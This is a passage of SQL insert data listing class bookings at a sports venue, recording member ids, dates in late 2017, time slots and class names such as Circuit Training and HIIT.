(11314, 231, 'CTR', '2017-11-27', '17h30', '18h00', 'Circuit Training'),
(11310, 140, 'CTR', '2017-11-22', '18h00', '18h30', 'Circuit Training'),
(11309, 3, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11308, 261, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11307, 132, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11306, 31, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11305, 230, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11304, 140, 'CTR', '2017-11-22', '18h00', '18h30', 'Circuit Training'),
(11303, 255, 'CTR', '2017-11-20', '17h30', '18h00', 'Circuit Training'),
(11299, 132, 'CTR', '2017-11-22', '20h30', '21h00', 'Circuit training'),
(11298, 105, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(11292, 90, 'CTR', '2017-11-22', '20h30', '21h00', 'Circuit training'),
(11293, 329, 'CTR', '2017-11-22', '20h30', '21h00', 'Circuit training'),
(11297, 230, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(11296, 325, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(11344, 326, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(11291, 323, 'CTR', '2017-11-22', '20h30', '21h00', 'Circuit training'),
(11290, 165, 'CTR', '2017-11-22', '20h30', '21h00', 'Circuit training'),
(11289, 205, 'CTR', '2017-11-22', '20h30', '21h00', 'Circuit training'),
(11288, 92, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11287, 138, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11286, 31, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11285, 48, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11284, 195, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11311, 338, 'CTR', '2017-11-22', '17h15', '18h00', 'Circuit Training'),
(11283, 339, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11315, 92, 'CTR', '2017-12-04', '17h30', '18h00', 'Circuit Training'),
(11280, 310, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11279, 247, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11278, 177, 'CTR', '2017-11-22', '18h00', '18h30', 'Circuit Training'),
(11277, 126, 'CTR', '2017-11-22', '18h00', '18h30', 'Circuit Training'),
(11313, 255, 'CTR', '2017-11-27', '17h30', '18h00', 'Circuit Training'),
(11275, 188, 'CTR', '2017-11-22', '17h15', '18h00', 'Circuit Training'),
(11343, 322, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(11268, 294, 'CTR', '2017-12-07', '18h45', '19h15', 'Circuit Training'),
(11393, 294, 'CTR', '2017-12-06', '20h30', '21h00', 'Circuit training'),
(11266, 294, 'CTR', '2017-11-29', '20h30', '21h00', 'Circuit training'),
(11265, 294, 'CTR', '2017-11-28', '18h15', '18h45', 'Circuit Training'),
(11264, 326, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11262, 281, 'CTR', '2017-11-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11261, 281, 'CTR', '2017-11-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11260, 306, 'CTR', '2017-11-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11259, 306, 'CTR', '2017-11-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11258, 301, 'CTR', '2017-11-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11257, 301, 'CTR', '2017-11-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11256, 297, 'CTR', '2017-11-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11255, 297, 'CTR', '2017-11-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11254, 265, 'CTR', '2017-11-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11253, 265, 'CTR', '2017-11-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11252, 298, 'CTR', '2017-11-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11251, 298, 'CTR', '2017-11-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11250, 132, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11249, 132, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11248, 334, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11247, 334, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11246, 48, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11242, 305, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11245, 48, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11240, 305, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11243, 260, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11244, 260, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11237, 328, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11236, 328, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11235, 330, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11234, 330, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11233, 205, 'CTR', '2017-11-20', '17h30', '18h00', 'Circuit Training'),
(11232, 92, 'CTR', '2017-11-20', '17h30', '18h00', 'Circuit Training'),
(11302, 48, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11227, 132, 'CTR', '2017-11-15', '18h00', '18h30', 'Circuit Training'),
(11226, 126, 'CTR', '2017-11-15', '18h00', '18h30', 'Circuit Training'),
(11273, 316, 'CTR', '2017-11-22', '17h15', '18h00', 'Circuit Training'),
(11228, 333, 'CTR', '2017-11-15', '17h15', '18h00', 'Circuit Training'),
(11221, 278, 'CTR', '2017-11-16', '18h00', '18h30', 'Circuit training'),
(11222, 278, 'CTR', '2017-11-16', '18h00', '18h30', 'Circuit training'),
(11213, 279, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11212, 279, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11211, 279, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11209, 205, 'CTR', '2017-11-15', '20h30', '21h00', 'Circuit training'),
(11208, 165, 'CTR', '2017-11-15', '20h30', '21h00', 'Circuit training'),
(11207, 323, 'CTR', '2017-11-15', '20h30', '21h00', 'Circuit training'),
(11206, 318, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11204, 339, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11203, 173, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11202, 31, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11201, 48, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11200, 310, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11199, 247, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11269, 280, 'CTR', '2017-11-22', '18h45', '19h15', 'Circuit training'),
(11197, 195, 'CTR', '2017-11-15', '18h45', '19h15', 'Circuit training'),
(11272, 267, 'CTR', '2017-11-16', '12h45', '13h15', 'Circuit Training'),
(11225, 138, 'CTR', '2017-11-15', '17h15', '18h00', 'Circuit Training'),
(11229, 231, 'CTR', '2017-11-20', '17h30', '18h00', 'Circuit Training'),
(11193, 296, 'CTR', '2017-11-15', '18h00', '18h30', 'Circuit Training'),
(11192, 177, 'CTR', '2017-11-15', '18h00', '18h30', 'Circuit Training'),
(11191, 333, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11271, 189, 'CTR', '2017-11-16', '12h45', '13h15', 'Circuit Training'),
(11270, 205, 'CTR', '2017-11-16', '12h45', '13h15', 'Circuit Training'),
(11188, 188, 'CTR', '2017-11-15', '17h15', '18h00', 'Circuit Training'),
(11187, 180, 'CTR', '2017-11-15', '17h15', '18h00', 'Circuit Training'),
(11186, 205, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11185, 230, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11184, 31, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11183, 261, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11182, 269, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11181, 3, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11180, 180, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11179, 329, 'CTR', '2017-11-16', '18h00', '18h30', 'Circuit training'),
(11178, 304, 'CTR', '2017-11-27', '17h30', '18h00', 'Circuit Training'),
(11177, 304, 'CTR', '2017-11-20', '17h30', '18h00', 'Circuit Training'),
(11176, 304, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11175, 328, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11174, 328, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11173, 330, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11172, 330, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11171, 294, 'CTR', '2017-11-15', '20h30', '21h00', 'Circuit training'),
(11170, 230, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11169, 132, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11168, 264, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11167, 264, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11166, 261, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11163, 205, 'CTR', '2017-11-09', '18h45', '19h15', 'Circuit Training'),
(11162, 105, 'CTR', '2017-11-09', '18h45', '19h15', 'Circuit Training'),
(11161, 193, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11160, 205, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11159, 325, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11263, 322, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11164, 80, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11156, 105, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11219, 338, 'CTR', '2017-11-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11220, 338, 'CTR', '2017-11-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11153, 80, 'CTR', '2017-11-09', '18h45', '19h15', 'Circuit Training'),
(11151, 193, 'CTR', '2017-11-09', '18h45', '19h15', 'Circuit Training'),
(11150, 324, 'CTR', '2017-11-15', '17h15', '18h00', 'Circuit Training'),
(11146, 205, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11143, 338, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11142, 338, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11141, 281, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11140, 281, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11139, 306, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11138, 306, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11137, 301, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11136, 301, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11135, 297, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11134, 297, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11133, 265, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11132, 265, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11223, 327, 'CTR', '2017-11-16', '18h00', '18h30', 'Circuit training'),
(11224, 80, 'CTR', '2017-11-16', '18h00', '18h30', 'Circuit training'),
(11129, 298, 'CTR', '2017-11-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11128, 298, 'CTR', '2017-11-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11127, 305, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11126, 305, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11125, 260, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11124, 260, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11123, 48, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11122, 48, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11217, 341, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11218, 341, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11300, 337, 'CTR', '2017-11-27', '17h30', '18h00', 'Circuit Training'),
(11118, 205, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11111, 329, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11110, 336, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11109, 210, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11112, 193, 'CTR', '2017-11-07', '18h15', '18h45', 'Circuit Training'),
(11115, 92, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11107, 192, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11148, 324, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11102, 177, 'CTR', '2017-11-08', '18h00', '18h30', 'Circuit Training'),
(11101, 311, 'CTR', '2017-11-08', '18h00', '18h30', 'Circuit Training'),
(11100, 126, 'CTR', '2017-11-08', '18h00', '18h30', 'Circuit Training'),
(11099, 168, 'CTR', '2017-11-08', '18h00', '18h30', 'Circuit Training'),
(11098, 296, 'CTR', '2017-11-08', '18h00', '18h30', 'Circuit Training'),
(11152, 269, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11145, 313, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11061, 303, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11064, 80, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11093, 80, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11092, 195, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11091, 92, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11090, 280, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11089, 138, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11088, 318, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11087, 247, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11084, 48, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11083, 48, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11082, 92, 'CTR', '2017-11-06', '17h30', '18h00', 'Circuit Training'),
(11116, 231, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11117, 138, 'CTR', '2017-11-13', '17h30', '18h00', 'Circuit Training'),
(11080, 264, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11079, 264, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11078, 298, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11077, 298, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11085, 173, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11071, 334, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11070, 334, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11069, 305, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11068, 305, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11147, 308, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11065, 80, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11060, 303, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11075, 230, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11073, 31, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11074, 31, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11057, 281, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11056, 281, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11055, 306, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11054, 306, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11053, 301, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11052, 301, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11051, 297, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11049, 265, 'CTR', '2017-11-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11050, 297, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11048, 265, 'CTR', '2017-11-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11045, 337, 'CTR', '2017-11-06', '17h30', '18h00', 'Circuit Training'),
(11044, 294, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11043, 180, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11042, 205, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11041, 230, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11040, 132, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11038, 48, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11037, 48, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11047, 279, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11046, 279, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11063, 132, 'CTR', '2017-11-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11062, 132, 'CTR', '2017-11-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11032, 260, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11031, 260, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11030, 255, 'CTR', '2017-11-06', '17h30', '18h00', 'Circuit Training'),
(11029, 231, 'CTR', '2017-11-06', '17h30', '18h00', 'Circuit Training'),
(11028, 138, 'CTR', '2017-11-06', '17h30', '18h00', 'Circuit Training'),
(11027, 80, 'CTR', '2017-11-09', '18h45', '19h15', 'Circuit Training'),
(11026, 325, 'CTR', '2017-11-09', '18h45', '19h15', 'Circuit Training'),
(11024, 294, 'CTR', '2017-11-16', '18h45', '19h15', 'Circuit Training'),
(11023, 294, 'CTR', '2017-11-17', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11113, 278, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(11301, 138, 'CTR', '2017-11-20', '17h30', '18h00', 'Circuit Training'),
(11086, 310, 'CTR', '2017-11-08', '18h45', '19h15', 'Circuit training'),
(11039, 205, 'CTR', '2017-11-06', '17h30', '18h00', 'Circuit Training'),
(11011, 318, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(11009, 80, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11008, 80, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11007, 302, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11006, 302, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11005, 80, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(11004, 80, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(11003, 180, 'CTR', '2017-11-01', '17h15', '18h00', 'Circuit Training'),
(11002, 31, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(11001, 48, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(11000, 138, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(10999, 280, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(10998, 195, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(10997, 132, 'CTR', '2017-11-01', '18h00', '18h30', 'Circuit Training'),
(10996, 177, 'CTR', '2017-11-01', '18h00', '18h30', 'Circuit Training'),
(10995, 168, 'CTR', '2017-11-01', '18h00', '18h30', 'Circuit Training'),
(10942, 294, 'CTR', '2017-11-07', '18h15', '18h45', 'Circuit Training'),
(10950, 80, 'CTR', '2017-10-26', '18h00', '18h30', 'Circuit training'),
(10947, 311, 'CTR', '2017-10-25', '18h00', '18h30', 'Circuit Training'),
(10991, 336, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10990, 269, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10989, 324, 'CTR', '2017-11-01', '17h15', '18h00', 'Circuit Training'),
(10988, 324, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(10987, 298, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10986, 298, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10985, 303, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10984, 303, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10983, 281, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10982, 281, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10981, 306, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10980, 306, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10979, 301, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10978, 301, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10977, 297, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10976, 297, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10975, 265, 'CTR', '2017-10-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10974, 265, 'CTR', '2017-10-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10973, 48, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10972, 48, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10971, 328, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10970, 328, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10969, 330, 'CTR', '2017-11-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10968, 330, 'CTR', '2017-11-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10967, 305, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10966, 334, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10965, 334, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10963, 304, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(10962, 255, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(10961, 205, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(10960, 138, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(10964, 231, 'CTR', '2017-10-30', '17h30', '18h00', 'Circuit Training'),
(10992, 311, 'CTR', '2017-11-01', '18h00', '18h30', 'Circuit Training'),
(10993, 296, 'CTR', '2017-11-01', '18h00', '18h30', 'Circuit Training'),
(10956, 325, 'CTR', '2017-11-02', '18h45', '19h15', 'Circuit Training'),
(10955, 80, 'CTR', '2017-11-02', '18h45', '19h15', 'Circuit Training'),
(10954, 230, 'CTR', '2017-11-02', '18h45', '19h15', 'Circuit Training'),
(10946, 205, 'CTR', '2017-10-25', '20h30', '21h00', 'Circuit training'),
(10945, 280, 'CTR', '2017-10-25', '18h45', '19h15', 'Circuit training'),
(11012, 80, 'CTR', '2017-11-01', '18h45', '19h15', 'Circuit training'),
(10941, 294, 'CTR', '2017-11-10', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10940, 294, 'CTR', '2017-11-01', '17h15', '18h00', 'Circuit Training'),
(11016, 333, 'CTR', '2017-11-01', '17h15', '18h00', 'Circuit Training'),
(10938, 132, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10937, 132, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10936, 294, 'CTR', '2017-10-26', '18h45', '19h15', 'Circuit Training'),
(10935, 230, 'CTR', '2017-10-26', '18h45', '19h15', 'Circuit Training'),
(10934, 138, 'CTR', '2017-10-26', '18h45', '19h15', 'Circuit Training'),
(10933, 205, 'CTR', '2017-10-26', '18h45', '19h15', 'Circuit Training'),
(10932, 80, 'CTR', '2017-10-26', '18h00', '18h30', 'Circuit training'),
(10931, 331, 'CTR', '2017-10-26', '18h00', '18h30', 'Circuit training'),
(11014, 249, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10930, 305, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11013, 249, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10927, 260, 'CTR', '2017-10-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10926, 260, 'CTR', '2017-10-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11144, 294, 'CTR', '2017-11-08', '19h30', '20h00', 'Les amis de Max ;-)'),
(10923, 308, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10925, 132, 'CTR', '2017-10-25', '20h30', '21h00', 'Circuit training'),
(10921, 132, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10920, 31, 'CTR', '2017-10-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
